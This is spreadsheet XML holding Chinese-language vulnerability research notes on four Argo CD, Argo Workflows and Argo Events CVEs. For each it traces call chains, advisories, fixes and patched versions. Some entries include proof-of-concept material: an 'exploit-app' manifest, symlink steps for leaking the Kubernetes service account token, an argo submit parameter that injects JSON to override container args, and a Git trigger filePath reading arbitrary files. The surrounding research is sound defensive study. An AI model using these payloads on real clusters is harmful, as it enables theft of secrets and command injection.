app.Status.SetConditions(conditions, map[appv1.ApplicationConditionType]bool{
  appv1.ApplicationConditionComparisonError:         true,
  appv1.ApplicationConditionSharedResourceWarning:   true,
  appv1.ApplicationConditionRepeatedResourceWarning: true,
  appv1.ApplicationConditionExcludedResourceWarning: true,
 })
</t>
  </si>
  <si>
    <t xml:space="preserve">
    → Repo Server (gRPC 请求)
 {
            MethodName: "GetAppDetails",
            Handler:    _RepositoryService_GetAppDetails_Handler,
        },
 -&gt; func (s *Service) GetAppDetails(ctx context.Context, q *apiclient.RepoServerAppDetailsQuery) (*apiclient.RepoAppDetailsResponse, error) { -&gt;if err := populateHelmAppDetails(res, ctx.appPath, q); err != nil {
-&gt;
if err := loadFileIntoIfExists(filepath.Join(appPath, "values.yaml"), &amp;res.Helm.Values); err != nil {
        return err
    }</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">调用深度：9
CLI 工具: NewApplicationCreateCommand [CLI工具】-&gt; Create(server\application\application.go)/
 控制器： func (ctrl *ApplicationController) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>autoSync</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(app *appv1.Application, syncStatus *appv1.SyncStatus, resources []appv1.ResourceStatus) *appv1.ApplicationCondition 【控制器】 -&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>SetAppOperation</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">-&gt; func (s *Server) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Update</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
后面的一致：
-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>validateAndUpdateApp</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>validateAndNormalizeApp</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-&gt;
fun</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>c ValidateRepo</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-&gt;appDetails, err := repoClient</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">.GetAppDetails (grpc client 调用）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-&gt; func (s *Service)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> GetAppDetails</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(ctx context.Context, q *apiclient.RepoServerAppDetailsQuery) (*apiclient.RepoAppDetailsResponse, error) { -&gt;if err := </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>populateHelmAppDetails</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(res, ctx.appPath, q); err != nil {
-&gt;
if err := </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>loadFileIntoIfExist</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">s(filepath.Join(appPath, "values.yaml"), &amp;res.Helm.Values); err != nil {
        return err
    }
-----
repo-server grpc 调用
MethodName: "GetAppDetails",
   Handler:    _RepositoryService_GetAppDetails_Handler,
GetAppDetails-&gt;populateHelmAppDetails-&gt; loadFileIntoIfExists
</t>
    </r>
  </si>
  <si>
    <t>repo-server( controller中通过grpc调用）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>去除sink点，使用更安全的api</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
使用 pathutil.ResolvedFilePath 类型替代普通字符串
所有文件路径都经过 ResolveFilePath 验证
增加了错误处理和警告日志
使用类型安全的路径处理</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">控制器校验： 直接增加校验逻辑
</t>
  </si>
  <si>
    <t>验证逻辑增加</t>
  </si>
  <si>
    <t xml:space="preserve">自定义校验函数:
util\io\path\resolved.go
pathutil.ResolveFilePath-&gt; 对官方库的wrapper
</t>
  </si>
  <si>
    <t>CVE-2022-31016（ada logic fuzzer发现）</t>
  </si>
  <si>
    <t>ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-17: DoS through large manifest files</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD is a declarative continuous deployment for Kubernetes. Argo CD versions v0.7.0 and later are vulnerable to an uncontrolled memory consumption bug, </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>allowing an authorized malicious user to crash the repo-server service, resulting in a Denial of Service. The attacker must be an authenticated Argo CD user authorized to deploy Applications from a repository which contains (or can be made to contain) a large file.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> The fix for this vulnerability is available in versions 2.3.5, 2.2.10, 2.1.16, and later. There are no known workarounds. Users are recommended to upgrade.</t>
    </r>
  </si>
  <si>
    <t>0.7.0 through 2.1.15, 2.2.9, 2.3.4, 2.4.0</t>
  </si>
  <si>
    <t xml:space="preserve">2.1.16, 2.2.10, 2.3.5, 2.4.1
https://github.com/argoproj/argo-cd/commit/a92a153a4909c928de6bddbc2ec5599c1824307a
</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq</t>
  </si>
  <si>
    <t>攻击者需要：
- 是 Argo CD 的授权用户
- 对某个仓库有写入权限
- 该仓库被（或可能被）用于 directory-type Application</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击步骤：
1. 在被授权的仓库中创建恶意符号链接
2. 符号链接指向仓库边界外的敏感文件
3. 利用 Argo CD 的符号链接解析机制
4. 获取目标文件内容
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-16: Path traversal leading to reading of out of
bounds manifest files</t>
    </r>
  </si>
  <si>
    <t>控制平面组件-&gt; repo-server</t>
  </si>
  <si>
    <t>是
调用不安全的文件读取接口
-&gt; 需要指定特定的resource配置才可触发，但不是通过资源本身的字段注入触发的</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>an application source type v1alpha1.ApplicationSourceTypeDirectory (非注入，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>只有当app 设置为v1alpha1.ApplicationSourceTypeDirector source type时漏洞才可被触发</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">）
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: exploit-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git
    targetRevision: main
    path: exploit-dir
    directory:
      recurse: true     # 启用递归遍历
      include: "*.yaml" #  放置一个巨大的文件
  destination:
    server: https://kubernetes.default.svc
    namespace: default
</t>
    </r>
  </si>
  <si>
    <t>数据面（容器） → 宿主机</t>
  </si>
  <si>
    <t>文件操作-&gt;out, err := utfutil.ReadFile(path, utfutil.UTF8)</t>
  </si>
  <si>
    <t>经典控制器
​
CLI 命令的实现（argocd app diff、sync、manifests 等命令属于 ​客户端工具链，其实现通常位于 Argo CD 的 cmd 包或独立的 CLI 模块中，而非控制器核心逻辑中。这些命令通过调用 Argo CD API 或直接操作 Kubernetes API 实现功能。）</t>
  </si>
  <si>
    <t xml:space="preserve">
repository.GenerateManifests() 
  -&gt; ApplicationSourceTypeDirectory 
    -&gt; repository.findManifests()
      -&gt; utfutil.ReadFile() // 漏洞点</t>
  </si>
  <si>
    <t>sink点涉及跨组件：
    → Repo Server (gRPC 请求)
 MethodName: "GenerateManifest",
            Handler:    _RepoServerService_GenerateManifest_Handler,
 func (s *Service) GenerateManifest-&gt;func (s *Service) runManifestGen-&gt;-&gt;GenerateManifests （reposerver\repository\repository.go）-&gt; targetObjs, err = findManifests(logCtx, appPath, repoRoot, env, *directory) -&gt;out, err := utfutil.ReadFile(path, utfutil.UTF8)</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>传播深度：8（ 最长）
processAppRefreshQueueItem(synchandler) -&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>CompareAppState</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>-&gt; targetObjs, manifestInfo, err = m.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>getRepoObjs(</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>app, source, appLabelKey, revision, noCache, noRevisionCache, verifySignature, project)-&gt;
manifestInfo, err := repoClient.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>GenerateManifest</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
）
 → Repo Server (gRPC 请求)
 MethodName: "GenerateManifest",
            Handler:    _RepoServerService_GenerateManifest_Handler,
 func (s *Service) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>GenerateManifest</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>-&gt;func (s *Service)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> runManifestGen</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>-&gt;-&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">GenerateManifests </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（reposerver\repository\repository.go）-&gt; targetObjs, err =</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> findManifests</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(logCtx, appPath, repoRoot, env, *directory) -&gt;out, err :=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> utfutil.ReadFile</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(path, utfutil.UTF8)</t>
    </r>
  </si>
  <si>
    <t>增加check : maxCombinedDirectoryManifestsSize
maxCombinedDirectoryManifestsQuantity, err := resource.ParseQuantity(maxCombinedDirectoryManifestsSize)
   errors.CheckError(err)</t>
  </si>
  <si>
    <t xml:space="preserve">repo-server 初始化的时候设定资源限制值
</t>
  </si>
  <si>
    <t>资源控制策略一般在server 初始化函数中</t>
  </si>
  <si>
    <t>CVE-2022-24904（ada logic fuzzer发现）</t>
  </si>
  <si>
    <t xml:space="preserve">symlink following bug
ada logic 2022 安全审计报告：ADA-ARGO-SA-16: Path traversal leading to reading of out of
bounds manifest files
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 0.7.0 and prior to versions 2.1.15m 2.2.9, and 2.3.4 is vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive files from Argo CD's repo-server.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> A malicious Argo CD user with write access for a repository which is (or may be) used in a directory-type Application may commit a symlink which points to an out-of-bounds file. Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any JSON-formatted secrets which have been mounted as files on the repo-server.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> A patch for this vulnerability has been released in Argo CD versions 2.3.4, 2.2.9, and 2.1.15. Users of versions 2.3.0 or above who do not have any Jsonnet/directory-type Applications may disable the Jsonnet/directory config management tool as a workaround.</t>
    </r>
  </si>
  <si>
    <t>0.7.0 through 2.1.14, 2.2.8, 2.3.3</t>
  </si>
  <si>
    <t xml:space="preserve">2.3.4, 2.2.9, 2.1.15
https://github.com/argoproj/argo-cd/commit/7357cfdb58a560de70a0538c6e3bef6fe39505ea#diff-66db997cf6001ce63d5c5803380962f4b474aae67abacc9e86192673080d2c59
</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-6gcg-hp2x-q54h</t>
  </si>
  <si>
    <t>单节点（ 读取宿主机上的特定文件)
存在单节点-&gt; 集群范围（可读取特定的密钥文件，如/var/run/secrets/kubernetes.io/serviceaccount/token，获取特定的宿主机上的敏感密钥文件）</t>
  </si>
  <si>
    <t xml:space="preserve">是
路径遍历漏洞-&gt; 需要指定特定的resource配置才可触发，但不是通过资源本身的字段注入触发的 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>an application source type v1alpha1.ApplicationSourceTypeDirectory (非注入，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>只有当app 设置为v1alpha1.ApplicationSourceTypeDirector source type时漏洞才可被触发</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>）
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: exploit-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git
    targetRevision: main
    path: exploit-dir
    directory:
      recurse: true     # 启用递归遍历
      include: "*.yaml" # 匹配符号链接文件
  destination:
    server: https://kubernetes.default.svc
    namespace: default
攻击步骤：
在仓库的 exploit-dir 目录中创建符号链接文件（如 link-to-secret.yaml -&gt; /var/run/secrets/kubernetes.io/serviceaccount/token）。
Argo CD 同步应用时，解析符号链接并读取目标文件内容，通过清单响应泄露敏感信息。</t>
    </r>
  </si>
  <si>
    <t>增加check: 添加files.IsSymLink check</t>
  </si>
  <si>
    <t>自定义校验函数： filepath.EvalSymlinks</t>
  </si>
  <si>
    <t>CVE-2021-37914</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">允许攻击者通过输入参数注入恶意构造的 JSON 片段，篡改工作流模板的 ​运行时定义，从而绕过预期逻辑并执行任意操作。其核心问题在于：
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1. Golang JSON 序列化允许重复键</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">，后出现的键会覆盖前值。
2. 模板键的字母顺序排序，使攻击者可通过参数注入覆盖关键字段（如 args），。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>动态解析参数-&gt; 动态提供参数对原资源配置文件中的字段进行注入
数据流传播路径较为复杂！</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>In Argo Workflows through 3.1.3,</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> if EXPRESSION_TEMPLATES is enabled and untrusted users are allowed to specify input parameters when running workflows,</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> an attacker may be able to disrupt a workflow because expression template output is evaluated.</t>
    </r>
  </si>
  <si>
    <t>&lt;v3.1.3</t>
  </si>
  <si>
    <t>v3.1.3
https://github.com/argoproj/argo-workflows/pull/6285</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-workflows/issues/6441
https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q</t>
  </si>
  <si>
    <t>是合法的 Argo Workflows 用户
有权限提交和修改工作流
目标工作流允许参数输入
参数值被用于模版注入替换</t>
  </si>
  <si>
    <t>1. 提交包含恶意参数的工作流
2. concat 步骤输出恶意 JSON 片段
3. print 步骤解析 JSON 时，后面的字段覆盖前面的字段
4. 导致命令执行被篡改
​命令执行：覆盖 args 或 command 字段，执行任意容器命令。
​环境变量篡改：修改 env 字段，泄露敏感信息或影响业务流程。
​权限提升：结合 Kubernetes 服务账户权限，可能实现集群内横向移动。</t>
  </si>
  <si>
    <t>命令执行、信息泄露、权限提升</t>
  </si>
  <si>
    <t>权限提升、信息泄露</t>
  </si>
  <si>
    <t>容器内权限提升-&gt; 执行任意容器命令
集群范围内的权限提升-&gt; 需要特定的利用前提</t>
  </si>
  <si>
    <t>直接注入（ 动态参数注入）</t>
  </si>
  <si>
    <t xml:space="preserve">Workflow.template
templates:
  - name: print
    container:
      args:
        - echo "$MESSAGE"
      env:
        - name: MESSAGE
          value: "{{=inputs.parameters['message']}}"  # 漏洞点
通过向模板注入恶意 JSON 结构来修改工作流行为。
# 问题出在表达式模板的输出被作为 JSON 字符串的一部分进行求值
# 通过注入特定的 JSON 结构可以覆盖原有字段
inputs:
  parameters:
    - name: message
      # 通过 {{=inputs.parameters['message']}} 注入 JSON
----
workflow 配置：
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: rewrite-args
spec:
  entrypoint: main
  arguments:
    parameters:
      - name: a
  templates:
    - name: main
      steps:
        - - name: concat
            template: concat
        - - name: print
            template: print
            arguments:
              parameters:
                - name: message
                  value: "{{steps.concat.outputs.result}}"
    - name: concat
      script:
        image: debian:9.4
        command: [bash]
        env:
          - name: A
            value: "{{workflow.parameters.a}}"  # 攻击者控制此参数
        source: |
          echo "$A"  # 输出恶意构造的字符串
    - name: print
      inputs:
        parameters:
          - name: message
      container:
        image: debian:9.4
        command: [bash, -c]
        args:
          - echo "$MESSAGE"  # 预期输出正常消息
        env:
          - name: MESSAGE
            value: "{{=inputs.parameters['message']}}"  # 注入点：动态解析参数
运行时动态提供参数进行覆盖：
argo submit rewrite-args.yaml -p 'a="}], "args": ["echo nope"], "env": [{"name": "MESSAGE", "value": "unused"'
</t>
  </si>
  <si>
    <t>spec（模版类字段）</t>
  </si>
  <si>
    <t>命令行参数注入-&gt; 注入的是资源配置中的特定模版</t>
  </si>
  <si>
    <t>跨信任域数据传递
信任域：
用户输入层：终端用户提交的工作流定义（YAML）或参数。
​工作流引擎层：Argo Workflows 控制器解析和执行工作流的逻辑。
​Kubernetes 集群层：工作流实际操作的 Pod、Service 等资源。
​多租户隔离层​（若存在）：不同用户/团队之间的资源隔离。</t>
  </si>
  <si>
    <t>用户输入层-&gt; 数据面</t>
  </si>
  <si>
    <t xml:space="preserve">危险的函数操作主要涉及 Go 的 JSON 处理和模板表达式求值
-&gt; TODO 相关操作后续是否修改了什么底层的资源？
模版引擎替换函数
func (t *impl) Replace(replaceMap map[string]string, allowUnresolved bool) (string, error) {
    env := exprenv.GetFuncMap(envMap(replaceMap))
    replacedTmpl := &amp;bytes.Buffer{}
    _, err := t.Template.ExecuteFunc(replacedTmpl, func(w io.Writer, tag string) (int, error) {
        kind, expression := parseTag(tag)
        switch kind {
        case kindExpression:
            return expressionReplace(w, expression, env, allowUnresolved)
        default:
            return simpleReplace(w, tag, replaceMap, allowUnresolved)
        }
    })
    return replacedTmpl.String(), err
}
</t>
  </si>
  <si>
    <t xml:space="preserve">符合controller reconcile 调用模式
</t>
  </si>
  <si>
    <t>不存在跨组件</t>
  </si>
  <si>
    <t>无明显特征</t>
  </si>
  <si>
    <t xml:space="preserve">调用深度：10
func (wfc *WorkflowController) processNextItem(控制器函数入口） 读函数：obj, exists, err := wfc.wfInformer.GetIndexer().GetByKey(key.(string))
un, ok := obj.(*unstructured.Unstructured)
    if !ok {
        log.WithFields(log.Fields{"key": key}).Warn("Index is not an unstructured")
        return true
    }
    wf, err := util.FromUnstructured(un)
非结构化转换
 -&gt;func (woc *wfOperationCtx) operate(ctx context.Context) -&gt;func (woc *wfOperationCtx) executeTemplate-&gt;func (woc *wfOperationCtx) executeSteps(-&gt; func (woc *wfOperationCtx) executeStepGroup-&gt; func (woc *wfOperationCtx) expandStep -&gt; processItem-&gt;  newStepStr, err := tmpl.Replace(replaceMap, false) // 问题位置 -》func (t *impl) Replace-》func expressionReplace-》 result, err := expr.Eval(expression, env) // 表达式执行的位置
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>增加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
使用 json.Marshal 确保所有特殊字符都被正确转义，避免了 JSON 解析器将输入解释为结构化数据</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">控制器校验： 直接增加校验逻辑
TODO: 不确定是否存在，没找到具体的校验点
</t>
  </si>
  <si>
    <t>CVE-2022-25856</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-13: Insecure path traversal in Git Trigger
Source can lead to arbitrary file read
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>注： 项目中大部分的字段都存在直接使用的情况，可以再扫一下看看</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> Insecure path traversal in Git Trigger
Source can lead to arbitrary file read：A path traversal issue was found in the (g *GitArtifactReader).Read() API. Read()
calls into (g *GitArtifactReader).readFromRepository() that opens and reads the file
that contains the trigger resource definition</t>
  </si>
  <si>
    <t>&lt; v1.7.1</t>
  </si>
  <si>
    <t>v1.7.1
https://github.com/argoproj/argo-events/commit/d0f66dbce78bc31923ca057b20fc722aa24ca961</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c
https://github.com/argoproj/argo-events/issues/1947</t>
  </si>
  <si>
    <t>任一条件即可：
- 控制 Git 仓库
- 对文件系统有限访问权限
- 能够创建 Git Trigger Source</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>3种攻击方式：
1）符号链接攻击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击步骤：
1. 攻击者控制 Git 仓库
2. 在仓库中添加指向敏感文件的符号链接
3. 当 Argo 克隆仓库时，跟随符号链接
4. 读取敏感文件内容
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
2） 竞态条件攻击
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击步骤：
1. 攻击者需要对文件系统有限访问权限
2. 监控 git-temp 目录的创建
3. 在目录创建和文件读取之间
4. 将目录替换为指向目标目录的符号链接
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
3)  恶意清单攻击（ git trigger source)
GitArtifactReader.artifact.FilePath
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t># 攻击者创建恶意的 Git Trigger Source
triggers:
- template:
    name: workflow-trigger
    k8s:
      source:
        git:
          url: "git@github.com:argoproj/argo-workflows.git"
          filePath: "/path/to/sensitive/file"  # 指向任意敏感文件
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-13: Insecure path traversal in Git Trigger
Source can lead to arbitrary file read</t>
    </r>
  </si>
  <si>
